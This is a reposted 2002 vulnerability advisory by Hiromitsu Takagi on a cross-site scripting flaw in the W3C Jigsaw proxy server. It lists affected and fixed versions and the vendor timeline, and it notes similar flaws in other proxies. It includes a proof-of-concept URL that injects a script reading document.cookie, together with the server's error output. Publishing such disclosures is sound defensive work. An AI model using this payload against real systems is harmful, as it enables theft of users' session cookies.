Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:3382
HistoryAug 20, 2002 - 12:00 a.m.

W3C Jigsaw Proxy Server: Cross-Site Scripting Vulnerability (REPOST)

2002-08-2000:00:00
vulners.com
12

W3C Jigsaw Proxy Server: Cross-Site Scripting Vulnerability

Affected:
Jigsaw 2.2.0 and earlier
http://www.w3.org/Jigsaw/RelNotes.html#2.2.0

Fixed:
Jigsaw 2.2.1
http://www.w3.org/Jigsaw/RelNotes.html#2.2.1

Exploit:
http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>

========================================================
An HTTP error occured while getting: <p>
<strong>http://nonexistenthost.google.com/&lt;SCRIPT&gt;document.write&#40;document.cookie&#41;&lt;/SCRIPT&gt;&lt;/strong&gt;&lt;p&gt;
Details "The host name [nonexistenthost.google.com] couldn't be resolved.
Details: "nonexistenthost.google.com"".<hr>Generated by
<i>http://…:8001/
…snip…

Similar problems have been found in Proxomitron Naoko-4 BetaFour,
Microsoft ISA Server and Squid 2.4 DEVEL4.
<http://www.securityfocus.com/bid/3087&gt;
<http://www.microsoft.com/technet/security/bulletin/MS01-045.asp&gt;
<http://www.securityfocus.com/archive/1/197606&gt;

Vendor Status:
Aug 10, 2001: Notified
Jan 4, 2002: Responded
Apr 8, 2002: Fix released

Best regards,

Hiromitsu Takagi
http://staff.aist.go.jp/takagi.hiromitsu/